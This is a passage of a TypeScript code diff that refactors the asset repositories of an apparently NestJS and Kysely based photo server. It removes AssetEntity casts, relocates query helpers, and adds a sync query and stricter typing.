|
||||||
async delete(id: string): Promise<void> {
|
async delete(id: string): Promise<void> {
|
||||||
|
@ -5,10 +5,9 @@ import { InjectKysely } from 'nestjs-kysely';
|
|||||||
import { columns } from 'src/database';
|
import { columns } from 'src/database';
|
||||||
import { DB } from 'src/db';
|
import { DB } from 'src/db';
|
||||||
import { DummyValue, GenerateSql } from 'src/decorators';
|
import { DummyValue, GenerateSql } from 'src/decorators';
|
||||||
import { withExifInner, withFaces, withFiles } from 'src/entities/asset.entity';
|
|
||||||
import { AssetFileType } from 'src/enum';
|
import { AssetFileType } from 'src/enum';
|
||||||
import { StorageAsset } from 'src/types';
|
import { StorageAsset } from 'src/types';
|
||||||
import { asUuid } from 'src/utils/database';
|
import { anyUuid, asUuid, withExifInner, withFaces, withFiles } from 'src/utils/database';
|
||||||
|
|
||||||
@Injectable()
|
@Injectable()
|
||||||
export class AssetJobRepository {
|
export class AssetJobRepository {
|
||||||
@ -149,6 +148,21 @@ export class AssetJobRepository {
|
|||||||
.executeTakeFirst();
|
.executeTakeFirst();
|
||||||
}
|
}
|
||||||
|
|
||||||
|
getForSyncAssets(ids: string[]) {
|
||||||
|
return this.db
|
||||||
|
.selectFrom('assets')
|
||||||
|
.select([
|
||||||
|
'assets.id',
|
||||||
|
'assets.isOffline',
|
||||||
|
'assets.libraryId',
|
||||||
|
'assets.originalPath',
|
||||||
|
'assets.status',
|
||||||
|
'assets.fileModifiedAt',
|
||||||
|
])
|
||||||
|
.where('assets.id', '=', anyUuid(ids))
|
||||||
|
.execute();
|
||||||
|
}
|
||||||
|
|
||||||
private storageTemplateAssetQuery() {
|
private storageTemplateAssetQuery() {
|
||||||
return this.db
|
return this.db
|
||||||
.selectFrom('assets')
|
.selectFrom('assets')
|
||||||
|
@ -1,14 +1,21 @@
|
|||||||
import { Injectable } from '@nestjs/common';
|
import { Injectable } from '@nestjs/common';
|
||||||
import { Insertable, Kysely, Selectable, UpdateResult, Updateable, sql } from 'kysely';
|
import { Insertable, Kysely, NotNull, Selectable, UpdateResult, Updateable, sql } from 'kysely';
|
||||||
import { isEmpty, isUndefined, omitBy } from 'lodash';
|
import { isEmpty, isUndefined, omitBy } from 'lodash';
|
||||||
import { InjectKysely } from 'nestjs-kysely';
|
import { InjectKysely } from 'nestjs-kysely';
|
||||||
|
import { Stack } from 'src/database';
|
||||||
import { AssetFiles, AssetJobStatus, Assets, DB, Exif } from 'src/db';
|
import { AssetFiles, AssetJobStatus, Assets, DB, Exif } from 'src/db';
|
||||||
import { Chunked, ChunkedArray, DummyValue, GenerateSql } from 'src/decorators';
|
import { Chunked, ChunkedArray, DummyValue, GenerateSql } from 'src/decorators';
|
||||||
|
import { MapAsset } from 'src/dtos/asset-response.dto';
|
||||||
|
import { AssetFileType, AssetOrder, AssetStatus, AssetType } from 'src/enum';
|
||||||
|
import { AssetSearchOptions, SearchExploreItem, SearchExploreItemSet } from 'src/repositories/search.repository';
|
||||||
import {
|
import {
|
||||||
AssetEntity,
|
anyUuid,
|
||||||
|
asUuid,
|
||||||
hasPeople,
|
hasPeople,
|
||||||
|
removeUndefinedKeys,
|
||||||
searchAssetBuilder,
|
searchAssetBuilder,
|
||||||
truncatedDate,
|
truncatedDate,
|
||||||
|
unnest,
|
||||||
withExif,
|
withExif,
|
||||||
withFaces,
|
withFaces,
|
||||||
withFacesAndPeople,
|
withFacesAndPeople,
|
||||||
@ -18,12 +25,9 @@ import {
|
|||||||
withSmartSearch,
|
withSmartSearch,
|
||||||
withTagId,
|
withTagId,
|
||||||
withTags,
|
withTags,
|
||||||
} from 'src/entities/asset.entity';
|
} from 'src/utils/database';
|
||||||
import { AssetFileType, AssetOrder, AssetStatus, AssetType } from 'src/enum';
|
|
||||||
import { AssetSearchOptions, SearchExploreItem, SearchExploreItemSet } from 'src/repositories/search.repository';
|
|
||||||
import { anyUuid, asUuid, removeUndefinedKeys, unnest } from 'src/utils/database';
|
|
||||||
import { globToSqlPattern } from 'src/utils/misc';
|
import { globToSqlPattern } from 'src/utils/misc';
|
||||||
import { Paginated, PaginationOptions, paginationHelper } from 'src/utils/pagination';
|
import { PaginationOptions, paginationHelper } from 'src/utils/pagination';
|
||||||
|
|
||||||
export type AssetStats = Record<AssetType, number>;
|
export type AssetStats = Record<AssetType, number>;
|
||||||
|
|
||||||
@ -126,8 +130,6 @@ export interface AssetGetByChecksumOptions {
|
|||||||
libraryId?: string;
|
libraryId?: string;
|
||||||
}
|
}
|
||||||
|
|
||||||
export type AssetPathEntity = Pick<AssetEntity, 'id' | 'originalPath' | 'isOffline'>;
|
|
||||||
|
|
||||||
export interface GetByIdsRelations {
|
export interface GetByIdsRelations {
|
||||||
exifInfo?: boolean;
|
exifInfo?: boolean;
|
||||||
faces?: { person?: boolean; withDeleted?: boolean };
|
faces?: { person?: boolean; withDeleted?: boolean };
|
||||||
@ -141,12 +143,12 @@ export interface GetByIdsRelations {
|
|||||||
|
|
||||||
export interface DuplicateGroup {
|
export interface DuplicateGroup {
|
||||||
duplicateId: string;
|
duplicateId: string;
|
||||||
assets: AssetEntity[];
|
assets: MapAsset[];
|
||||||
}
|
}
|
||||||
|
|
||||||
export interface DayOfYearAssets {
|
export interface DayOfYearAssets {
|
||||||
yearsAgo: number;
|
yearsAgo: number;
|
||||||
assets: AssetEntity[];
|
assets: MapAsset[];
|
||||||
}
|
}
|
||||||
|
|
||||||
@Injectable()
|
@Injectable()
|
||||||
@ -234,12 +236,12 @@ export class AssetRepository {
|
|||||||
.execute();
|
.execute();
|
||||||
}
|
}
|
||||||
|
|
||||||
create(asset: Insertable<Assets>): Promise<AssetEntity> {
|
create(asset: Insertable<Assets>) {
|
||||||
return this.db.insertInto('assets').values(asset).returningAll().executeTakeFirst() as any as Promise<AssetEntity>;
|
return this.db.insertInto('assets').values(asset).returningAll().executeTakeFirstOrThrow();
|
||||||
}
|
}
|
||||||
|
|
||||||
createAll(assets: Insertable<Assets>[]): Promise<AssetEntity[]> {
|
createAll(assets: Insertable<Assets>[]) {
|
||||||
return this.db.insertInto('assets').values(assets).returningAll().execute() as any as Promise<AssetEntity[]>;
|
return this.db.insertInto('assets').values(assets).returningAll().execute();
|
||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [DummyValue.UUID, { day: 1, month: 1 }] })
|
@GenerateSql({ params: [DummyValue.UUID, { day: 1, month: 1 }] })
|
||||||
@ -299,56 +301,13 @@ export class AssetRepository {
|
|||||||
|
|
||||||
@GenerateSql({ params: [[DummyValue.UUID]] })
|
@GenerateSql({ params: [[DummyValue.UUID]] })
|
||||||
@ChunkedArray()
|
@ChunkedArray()
|
||||||
async getByIds(
|
getByIds(ids: string[]) {
|
||||||
ids: string[],
|
return this.db.selectFrom('assets').selectAll('assets').where('assets.id', '=', anyUuid(ids)).execute();
|
||||||
{ exifInfo, faces, files, library, owner, smartSearch, stack, tags }: GetByIdsRelations = {},
|
|
||||||
): Promise<AssetEntity[]> {
|
|
||||||
const res = await this.db
|
|
||||||
.selectFrom('assets')
|
|
||||||
.selectAll('assets')
|
|
||||||
.where('assets.id', '=', anyUuid(ids))
|
|
||||||
.$if(!!exifInfo, withExif)
|
|
||||||
.$if(!!faces, (qb) =>
|
|
||||||
qb.select((eb) =>
|
|
||||||
faces?.person ? withFacesAndPeople(eb, faces.withDeleted) : withFaces(eb, faces?.withDeleted),
|
|
||||||
),
|
|
||||||
)
|
|
||||||
.$if(!!files, (qb) => qb.select(withFiles))
|
|
||||||
.$if(!!library, (qb) => qb.select(withLibrary))
|
|
||||||
.$if(!!owner, (qb) => qb.select(withOwner))
|
|
||||||
.$if(!!smartSearch, withSmartSearch)
|
|
||||||
.$if(!!stack, (qb) =>
|
|
||||||
qb
|
|
||||||
.leftJoin('asset_stack', 'asset_stack.id', 'assets.stackId')
|
|
||||||
.$if(!stack!.assets, (qb) => qb.select((eb) => eb.fn.toJson(eb.table('asset_stack')).as('stack')))
|
|
||||||
.$if(!!stack!.assets, (qb) =>
|
|
||||||
qb
|
|
||||||
.leftJoinLateral(
|
|
||||||
(eb) =>
|
|
||||||
eb
|
|
||||||
.selectFrom('assets as stacked')
|
|
||||||
.selectAll('asset_stack')
|
|
||||||
.select((eb) => eb.fn('array_agg', [eb.table('stacked')]).as('assets'))
|
|
||||||
.whereRef('stacked.stackId', '=', 'asset_stack.id')
|
|
||||||
.whereRef('stacked.id', '!=', 'asset_stack.primaryAssetId')
|
|
||||||
.where('stacked.deletedAt', 'is', null)
|
|
||||||
.where('stacked.isArchived', '=', false)
|
|
||||||
.groupBy('asset_stack.id')
|
|
||||||
.as('stacked_assets'),
|
|
||||||
(join) => join.on('asset_stack.id', 'is not', null),
|
|
||||||
)
|
|
||||||
.select((eb) => eb.fn.toJson(eb.table('stacked_assets')).as('stack')),
|
|
||||||
),
|
|
||||||
)
|
|
||||||
.$if(!!tags, (qb) => qb.select(withTags))
|
|
||||||
.execute();
|
|
||||||
|
|
||||||
return res as any as AssetEntity[];
|
|
||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [[DummyValue.UUID]] })
|
@GenerateSql({ params: [[DummyValue.UUID]] })
|
||||||
@ChunkedArray()
|
@ChunkedArray()
|
||||||
getByIdsWithAllRelations(ids: string[]): Promise<AssetEntity[]> {
|
getByIdsWithAllRelationsButStacks(ids: string[]) {
|
||||||
return this.db
|
return this.db
|
||||||
.selectFrom('assets')
|
.selectFrom('assets')
|
||||||
.selectAll('assets')
|
.selectAll('assets')
|
||||||
@ -356,23 +315,8 @@ export class AssetRepository {
|
|||||||
.select(withTags)
|
.select(withTags)
|
||||||
.$call(withExif)
|
.$call(withExif)
|
||||||
.leftJoin('asset_stack', 'asset_stack.id', 'assets.stackId')
|
.leftJoin('asset_stack', 'asset_stack.id', 'assets.stackId')
|
||||||
.leftJoinLateral(
|
|
||||||
(eb) =>
|
|
||||||
eb
|
|
||||||
.selectFrom('assets as stacked')
|
|
||||||
.selectAll('asset_stack')
|
|
||||||
.select((eb) => eb.fn('array_agg', [eb.table('stacked')]).as('assets'))
|
|
||||||
.whereRef('stacked.stackId', '=', 'asset_stack.id')
|
|
||||||
.whereRef('stacked.id', '!=', 'asset_stack.primaryAssetId')
|
|
||||||
.where('stacked.deletedAt', 'is', null)
|
|
||||||
.where('stacked.isArchived', '=', false)
|
|
||||||
.groupBy('asset_stack.id')
|
|
||||||
.as('stacked_assets'),
|
|
||||||
(join) => join.on('asset_stack.id', 'is not', null),
|
|
||||||
)
|
|
||||||
.select((eb) => eb.fn.toJson(eb.table('stacked_assets')).as('stack'))
|
|
||||||
.where('assets.id', '=', anyUuid(ids))
|
.where('assets.id', '=', anyUuid(ids))
|
||||||
.execute() as any as Promise<AssetEntity[]>;
|
.execute();
|
||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [DummyValue.UUID] })
|
@GenerateSql({ params: [DummyValue.UUID] })
|
||||||
@ -392,36 +336,29 @@ export class AssetRepository {
|
|||||||
return assets.map((asset) => asset.deviceAssetId);
|
return assets.map((asset) => asset.deviceAssetId);
|
||||||
}
|
}
|
||||||
|
|
||||||
getByUserId(
|
getByUserId(pagination: PaginationOptions, userId: string, options: Omit<AssetSearchOptions, 'userIds'> = {}) {
|
||||||
pagination: PaginationOptions,
|
|
||||||
userId: string,
|
|
||||||
options: Omit<AssetSearchOptions, 'userIds'> = {},
|
|
||||||
): Paginated<AssetEntity> {
|
|
||||||
return this.getAll(pagination, { ...options, userIds: [userId] });
|
return this.getAll(pagination, { ...options, userIds: [userId] });
|
||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [DummyValue.UUID, DummyValue.STRING] })
|
@GenerateSql({ params: [DummyValue.UUID, DummyValue.STRING] })
|
||||||
getByLibraryIdAndOriginalPath(libraryId: string, originalPath: string): Promise<AssetEntity | undefined> {
|
getByLibraryIdAndOriginalPath(libraryId: string, originalPath: string) {
|
||||||
return this.db
|
return this.db
|
||||||
.selectFrom('assets')
|
.selectFrom('assets')
|
||||||
.selectAll('assets')
|
.selectAll('assets')
|
||||||
.where('libraryId', '=', asUuid(libraryId))
|
.where('libraryId', '=', asUuid(libraryId))
|
||||||
.where('originalPath', '=', originalPath)
|
.where('originalPath', '=', originalPath)
|
||||||
.limit(1)
|
.limit(1)
|
||||||
.executeTakeFirst() as any as Promise<AssetEntity | undefined>;
|
.executeTakeFirst();
|
||||||
}
|
}
|
||||||
|
|
||||||
async getAll(
|
async getAll(pagination: PaginationOptions, { orderDirection, ...options }: AssetSearchOptions = {}) {
|
||||||
pagination: PaginationOptions,
|
|
||||||
{ orderDirection, ...options }: AssetSearchOptions = {},
|
|
||||||
): Paginated<AssetEntity> {
|
|
||||||
const builder = searchAssetBuilder(this.db, options)
|
const builder = searchAssetBuilder(this.db, options)
|
||||||
.select(withFiles)
|
.select(withFiles)
|
||||||
.orderBy('assets.createdAt', orderDirection ?? 'asc')
|
.orderBy('assets.createdAt', orderDirection ?? 'asc')
|
||||||
.limit(pagination.take + 1)
|
.limit(pagination.take + 1)
|
||||||
.offset(pagination.skip ?? 0);
|
.offset(pagination.skip ?? 0);
|
||||||
const items = await builder.execute();
|
const items = await builder.execute();
|
||||||
return paginationHelper(items as any as AssetEntity[], pagination.take);
|
return paginationHelper(items, pagination.take);
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
@ -456,23 +393,22 @@ export class AssetRepository {
|
|||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [DummyValue.UUID] })
|
@GenerateSql({ params: [DummyValue.UUID] })
|
||||||
getById(
|
getById(id: string, { exifInfo, faces, files, library, owner, smartSearch, stack, tags }: GetByIdsRelations = {}) {
|
||||||
id: string,
|
|
||||||
{ exifInfo, faces, files, library, owner, smartSearch, stack, tags }: GetByIdsRelations = {},
|
|
||||||
): Promise<AssetEntity | undefined> {
|
|
||||||
return this.db
|
return this.db
|
||||||
.selectFrom('assets')
|
.selectFrom('assets')
|
||||||
.selectAll('assets')
|
.selectAll('assets')
|
||||||
.where('assets.id', '=', asUuid(id))
|
.where('assets.id', '=', asUuid(id))
|
||||||
.$if(!!exifInfo, withExif)
|
.$if(!!exifInfo, withExif)
|
||||||
.$if(!!faces, (qb) => qb.select(faces?.person ? withFacesAndPeople : withFaces))
|
.$if(!!faces, (qb) => qb.select(faces?.person ? withFacesAndPeople : withFaces).$narrowType<{ faces: NotNull }>())
|
||||||
.$if(!!library, (qb) => qb.select(withLibrary))
|
.$if(!!library, (qb) => qb.select(withLibrary))
|
||||||
.$if(!!owner, (qb) => qb.select(withOwner))
|
.$if(!!owner, (qb) => qb.select(withOwner))
|
||||||
.$if(!!smartSearch, withSmartSearch)
|
.$if(!!smartSearch, withSmartSearch)
|
||||||
.$if(!!stack, (qb) =>
|
.$if(!!stack, (qb) =>
|
||||||
qb
|
qb
|
||||||
.leftJoin('asset_stack', 'asset_stack.id', 'assets.stackId')
|
.leftJoin('asset_stack', 'asset_stack.id', 'assets.stackId')
|
||||||
.$if(!stack!.assets, (qb) => qb.select((eb) => eb.fn.toJson(eb.table('asset_stack')).as('stack')))
|
.$if(!stack!.assets, (qb) =>
|
||||||
|
qb.select((eb) => eb.fn.toJson(eb.table('asset_stack')).$castTo<Stack | null>().as('stack')),
|
||||||
|
)
|
||||||
.$if(!!stack!.assets, (qb) =>
|
.$if(!!stack!.assets, (qb) =>
|
||||||
qb
|
qb
|
||||||
.leftJoinLateral(
|
.leftJoinLateral(
|
||||||
@ -489,13 +425,13 @@ export class AssetRepository {
|
|||||||
.as('stacked_assets'),
|
.as('stacked_assets'),
|
||||||
(join) => join.on('asset_stack.id', 'is not', null),
|
(join) => join.on('asset_stack.id', 'is not', null),
|
||||||
)
|
)
|
||||||
.select((eb) => eb.fn.toJson(eb.table('stacked_assets')).as('stack')),
|
.select((eb) => eb.fn.toJson(eb.table('stacked_assets')).$castTo<Stack | null>().as('stack')),
|
||||||
),
|
),
|
||||||
)
|
)
|
||||||
.$if(!!files, (qb) => qb.select(withFiles))
|
.$if(!!files, (qb) => qb.select(withFiles))
|
||||||
.$if(!!tags, (qb) => qb.select(withTags))
|
.$if(!!tags, (qb) => qb.select(withTags))
|
||||||
.limit(1)
|
.limit(1)
|
||||||
.executeTakeFirst() as any as Promise<AssetEntity | undefined>;
|
.executeTakeFirst();
|
||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [[DummyValue.UUID], { deviceId: DummyValue.STRING }] })
|
@GenerateSql({ params: [[DummyValue.UUID], { deviceId: DummyValue.STRING }] })
|
||||||
@ -524,7 +460,7 @@ export class AssetRepository {
|
|||||||
.execute();
|
.execute();
|
||||||
}
|
}
|
||||||
|
|
||||||
async update(asset: Updateable<Assets> & { id: string }): Promise<AssetEntity> {
|
async update(asset: Updateable<Assets> & { id: string }) {
|
||||||
const value = omitBy(asset, isUndefined);
|
const value = omitBy(asset, isUndefined);
|
||||||
delete value.id;
|
delete value.id;
|
||||||
if (!isEmpty(value)) {
|
if (!isEmpty(value)) {
|
||||||
@ -534,10 +470,10 @@ export class AssetRepository {
|
|||||||
.selectAll('assets')
|
.selectAll('assets')
|
||||||
.$call(withExif)
|
.$call(withExif)
|
||||||
.$call((qb) => qb.select(withFacesAndPeople))
|
.$call((qb) => qb.select(withFacesAndPeople))
|
||||||
.executeTakeFirst() as Promise<AssetEntity>;
|
.executeTakeFirst();
|
||||||
}
|
}
|
||||||
|
|
||||||
return this.getById(asset.id, { exifInfo: true, faces: { person: true } }) as Promise<AssetEntity>;
|
return this.getById(asset.id, { exifInfo: true, faces: { person: true } });
|
||||||
}
|
}
|
||||||
|
|
||||||
async remove(asset: { id: string }): Promise<void> {
|
async remove(asset: { id: string }): Promise<void> {
|
||||||
@ -545,7 +481,7 @@ export class AssetRepository {
|
|||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [{ ownerId: DummyValue.UUID, libraryId: DummyValue.UUID, checksum: DummyValue.BUFFER }] })
|
@GenerateSql({ params: [{ ownerId: DummyValue.UUID, libraryId: DummyValue.UUID, checksum: DummyValue.BUFFER }] })
|
||||||
getByChecksum({ ownerId, libraryId, checksum }: AssetGetByChecksumOptions): Promise<AssetEntity | undefined> {
|
getByChecksum({ ownerId, libraryId, checksum }: AssetGetByChecksumOptions) {
|
||||||
return this.db
|
return this.db
|
||||||
.selectFrom('assets')
|
.selectFrom('assets')
|
||||||
.selectAll('assets')
|
.selectAll('assets')
|
||||||
@ -553,17 +489,17 @@ export class AssetRepository {
|
|||||||
.where('checksum', '=', checksum)
|
.where('checksum', '=', checksum)
|
||||||
.$call((qb) => (libraryId ? qb.where('libraryId', '=', asUuid(libraryId)) : qb.where('libraryId', 'is', null)))
|
.$call((qb) => (libraryId ? qb.where('libraryId', '=', asUuid(libraryId)) : qb.where('libraryId', 'is', null)))
|
||||||
.limit(1)
|
.limit(1)
|
||||||
.executeTakeFirst() as Promise<AssetEntity | undefined>;
|
.executeTakeFirst();
|
||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [DummyValue.UUID, [DummyValue.BUFFER]] })
|
@GenerateSql({ params: [DummyValue.UUID, [DummyValue.BUFFER]] })
|
||||||
getByChecksums(userId: string, checksums: Buffer[]): Promise<AssetEntity[]> {
|
getByChecksums(userId: string, checksums: Buffer[]) {
|
||||||
return this.db
|
return this.db
|
||||||
.selectFrom('assets')
|
.selectFrom('assets')
|
||||||
.select(['id', 'checksum', 'deletedAt'])
|
.select(['id', 'checksum', 'deletedAt'])
|
||||||
.where('ownerId', '=', asUuid(userId))
|
.where('ownerId', '=', asUuid(userId))
|
||||||
.where('checksum', 'in', checksums)
|
.where('checksum', 'in', checksums)
|
||||||
.execute() as any as Promise<AssetEntity[]>;
|
.execute();
|
||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [DummyValue.UUID, DummyValue.BUFFER] })
|
@GenerateSql({ params: [DummyValue.UUID, DummyValue.BUFFER] })
|
||||||
@ -580,7 +516,7 @@ export class AssetRepository {
|
|||||||
return asset?.id;
|
return asset?.id;
|
||||||
}
|
}
|
||||||
|
|
||||||
findLivePhotoMatch(options: LivePhotoSearchOptions): Promise<AssetEntity | undefined> {
|
findLivePhotoMatch(options: LivePhotoSearchOptions) {
|
||||||
const { ownerId, otherAssetId, livePhotoCID, type } = options;
|
const { ownerId, otherAssetId, livePhotoCID, type } = options;
|
||||||
return this.db
|
return this.db
|
||||||
.selectFrom('assets')
|
.selectFrom('assets')
|
||||||
@ -591,7 +527,7 @@ export class AssetRepository {
|
|||||||
.where('type', '=', type)
|
.where('type', '=', type)
|
||||||
.where('exif.livePhotoCID', '=', livePhotoCID)
|
.where('exif.livePhotoCID', '=', livePhotoCID)
|
||||||
.limit(1)
|
.limit(1)
|
||||||
.executeTakeFirst() as Promise<AssetEntity | undefined>;
|
.executeTakeFirst();
|
||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql(
|
@GenerateSql(
|
||||||
@ -600,7 +536,7 @@ export class AssetRepository {
|
|||||||
params: [DummyValue.PAGINATION, property],
|
params: [DummyValue.PAGINATION, property],
|
||||||
})),
|
})),
|
||||||
)
|
)
|
||||||
async getWithout(pagination: PaginationOptions, property: WithoutProperty): Paginated<AssetEntity> {
|
async getWithout(pagination: PaginationOptions, property: WithoutProperty) {
|
||||||
const items = await this.db
|
const items = await this.db
|
||||||
.selectFrom('assets')
|
.selectFrom('assets')
|
||||||
.selectAll('assets')
|
.selectAll('assets')
|
||||||
@ -662,7 +598,7 @@ export class AssetRepository {
|
|||||||
.orderBy('createdAt')
|
.orderBy('createdAt')
|
||||||
.execute();
|
.execute();
|
||||||
|
|
||||||
return paginationHelper(items as any as AssetEntity[], pagination.take);
|
return paginationHelper(items, pagination.take);
|
||||||
}
|
}
|
||||||
|
|
||||||
getStatistics(ownerId: string, { isArchived, isFavorite, isTrashed }: AssetStatsOptions): Promise<AssetStats> {
|
getStatistics(ownerId: string, { isArchived, isFavorite, isTrashed }: AssetStatsOptions): Promise<AssetStats> {
|
||||||
@ -681,7 +617,7 @@ export class AssetRepository {
|
|||||||
.executeTakeFirstOrThrow();
|
.executeTakeFirstOrThrow();
|
||||||
}
|
}
|
||||||
|
|
||||||
getRandom(userIds: string[], take: number): Promise<AssetEntity[]> {
|
getRandom(userIds: string[], take: number) {
|
||||||
return this.db
|
return this.db
|
||||||
.selectFrom('assets')
|
.selectFrom('assets')
|
||||||
.selectAll('assets')
|
.selectAll('assets')
|
||||||
@ -691,7 +627,7 @@ export class AssetRepository {
|
|||||||
.where('deletedAt', 'is', null)
|
.where('deletedAt', 'is', null)
|
||||||
.orderBy((eb) => eb.fn('random'))
|
.orderBy((eb) => eb.fn('random'))
|
||||||
.limit(take)
|
.limit(take)
|
||||||
.execute() as any as Promise<AssetEntity[]>;
|
.execute();
|
||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [{ size: TimeBucketSize.MONTH }] })
|
@GenerateSql({ params: [{ size: TimeBucketSize.MONTH }] })
|
||||||
@ -744,7 +680,7 @@ export class AssetRepository {
|
|||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [DummyValue.TIME_BUCKET, { size: TimeBucketSize.MONTH, withStacked: true }] })
|
@GenerateSql({ params: [DummyValue.TIME_BUCKET, { size: TimeBucketSize.MONTH, withStacked: true }] })
|
||||||
async getTimeBucket(timeBucket: string, options: TimeBucketOptions): Promise<AssetEntity[]> {
|
async getTimeBucket(timeBucket: string, options: TimeBucketOptions) {
|
||||||
return this.db
|
return this.db
|
||||||
.selectFrom('assets')
|
.selectFrom('assets')
|
||||||
.selectAll('assets')
|
.selectAll('assets')
|
||||||
@ -777,7 +713,7 @@ export class AssetRepository {
|
|||||||
.as('stacked_assets'),
|
.as('stacked_assets'),
|
||||||
(join) => join.on('asset_stack.id', 'is not', null),
|
(join) => join.on('asset_stack.id', 'is not', null),
|
||||||
)
|
)
|
||||||
.select((eb) => eb.fn.toJson(eb.table('stacked_assets')).as('stack')),
|
.select((eb) => eb.fn.toJson(eb.table('stacked_assets').$castTo<Stack | null>()).as('stack')),
|
||||||
)
|
)
|
||||||
.$if(!!options.assetType, (qb) => qb.where('assets.type', '=', options.assetType!))
|
.$if(!!options.assetType, (qb) => qb.where('assets.type', '=', options.assetType!))
|
||||||
.$if(options.isDuplicate !== undefined, (qb) =>
|
.$if(options.isDuplicate !== undefined, (qb) =>
|
||||||
@ -789,11 +725,11 @@ export class AssetRepository {
|
|||||||
.where('assets.isVisible', '=', true)
|
.where('assets.isVisible', '=', true)
|
||||||
.where(truncatedDate(options.size), '=', timeBucket.replace(/^[+-]/, ''))
|
.where(truncatedDate(options.size), '=', timeBucket.replace(/^[+-]/, ''))
|
||||||
.orderBy('assets.localDateTime', options.order ?? 'desc')
|
.orderBy('assets.localDateTime', options.order ?? 'desc')
|
||||||
.execute() as any as Promise<AssetEntity[]>;
|
.execute();
|
||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [DummyValue.UUID] })
|
@GenerateSql({ params: [DummyValue.UUID] })
|
||||||
getDuplicates(userId: string): Promise<DuplicateGroup[]> {
|
getDuplicates(userId: string) {
|
||||||
return (
|
return (
|
||||||
this.db
|
this.db
|
||||||
.with('duplicates', (qb) =>
|
.with('duplicates', (qb) =>
|
||||||
@ -810,9 +746,15 @@ export class AssetRepository {
|
|||||||
(join) => join.onTrue(),
|
(join) => join.onTrue(),
|
||||||
)
|
)
|
||||||
.select('assets.duplicateId')
|
.select('assets.duplicateId')
|
||||||
.select((eb) => eb.fn('jsonb_agg', [eb.table('asset')]).as('assets'))
|
.select((eb) =>
|
||||||
|
eb
|
||||||
|
.fn('jsonb_agg', [eb.table('asset')])
|
||||||
|
.$castTo<MapAsset[]>()
|
||||||
|
.as('assets'),
|
||||||
|
)
|
||||||
.where('assets.ownerId', '=', asUuid(userId))
|
.where('assets.ownerId', '=', asUuid(userId))
|
||||||
.where('assets.duplicateId', 'is not', null)
|
.where('assets.duplicateId', 'is not', null)
|
||||||
|
.$narrowType<{ duplicateId: NotNull }>()
|
||||||
.where('assets.deletedAt', 'is', null)
|
.where('assets.deletedAt', 'is', null)
|
||||||
.where('assets.isVisible', '=', true)
|
.where('assets.isVisible', '=', true)
|
||||||
.where('assets.stackId', 'is', null)
|
.where('assets.stackId', 'is', null)
|
||||||
@ -837,7 +779,7 @@ export class AssetRepository {
|
|||||||
.where(({ not, exists }) =>
|
.where(({ not, exists }) =>
|
||||||
not(exists((eb) => eb.selectFrom('unique').whereRef('unique.duplicateId', '=', 'duplicates.duplicateId'))),
|
not(exists((eb) => eb.selectFrom('unique').whereRef('unique.duplicateId', '=', 'duplicates.duplicateId'))),
|
||||||
)
|
)
|
||||||
.execute() as any as Promise<DuplicateGroup[]>
|
.execute()
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
|
||||||
@ -881,7 +823,7 @@ export class AssetRepository {
|
|||||||
},
|
},
|
||||||
],
|
],
|
||||||
})
|
})
|
||||||
getAllForUserFullSync(options: AssetFullSyncOptions): Promise<AssetEntity[]> {
|
getAllForUserFullSync(options: AssetFullSyncOptions) {
|
||||||
const { ownerId, lastId, updatedUntil, limit } = options;
|
const { ownerId, lastId, updatedUntil, limit } = options;
|
||||||
return this.db
|
return this.db
|
||||||
.selectFrom('assets')
|
.selectFrom('assets')
|
||||||
@ -899,18 +841,18 @@ export class AssetRepository {
|
|||||||
.as('stacked_assets'),
|
.as('stacked_assets'),
|
||||||
(join) => join.on('asset_stack.id', 'is not', null),
|
(join) => join.on('asset_stack.id', 'is not', null),
|
||||||
)
|
)
|
||||||
.select((eb) => eb.fn.toJson(eb.table('stacked_assets')).as('stack'))
|
.select((eb) => eb.fn.toJson(eb.table('stacked_assets')).$castTo<Stack | null>().as('stack'))
|
||||||
.where('assets.ownerId', '=', asUuid(ownerId))
|
.where('assets.ownerId', '=', asUuid(ownerId))
|
||||||
.where('assets.isVisible', '=', true)
|
.where('assets.isVisible', '=', true)
|
||||||
.where('assets.updatedAt', '<=', updatedUntil)
|
.where('assets.updatedAt', '<=', updatedUntil)
|
||||||
.$if(!!lastId, (qb) => qb.where('assets.id', '>', lastId!))
|
.$if(!!lastId, (qb) => qb.where('assets.id', '>', lastId!))
|
||||||
.orderBy('assets.id')
|
.orderBy('assets.id')
|
||||||
.limit(limit)
|
.limit(limit)
|
||||||
.execute() as any as Promise<AssetEntity[]>;
|
.execute();
|
||||||
}
|
}
|
||||||
|
|
||||||
@GenerateSql({ params: [{ userIds: [DummyValue.UUID], updatedAfter: DummyValue.DATE, limit: 100 }] })
|
@GenerateSql({ params: [{ userIds: [DummyValue.UUID], updatedAfter: DummyValue.DATE, limit: 100 }] })
|
||||||
async getChangedDeltaSync(options: AssetDeltaSyncOptions): Promise<AssetEntity[]> {
|
async getChangedDeltaSync(options: AssetDeltaSyncOptions) {
|
||||||
return this.db
|
return this.db
|
||||||
.selectFrom('assets')
|
.selectFrom('assets')
|
||||||
.selectAll('assets')
|
.selectAll('assets')
|
||||||
@ -927,12 +869,12 @@ export class AssetRepository {
|
|||||||
.as('stacked_assets'),
|
.as('stacked_assets'),
|
||||||
(join) => join.on('asset_stack.id', 'is not', null),
|
(join) => join.on('asset_stack.id', 'is not', null),
|
||||||
)
|
)
|
||||||
.select((eb) => eb.fn.toJson(eb.table('stacked_assets')).as('stack'))
|
.select((eb) => eb.fn.toJson(eb.table('stacked_assets').$castTo<Stack | null>()).as('stack'))
|
||||||
.where('assets.ownerId', '=', anyUuid(options.userIds))
|
.where('assets.ownerId', '=', anyUuid(options.userIds))
|
||||||
.where('assets.isVisible', '=', true)
|
.where('assets.isVisible', '=', true)
|
||||||
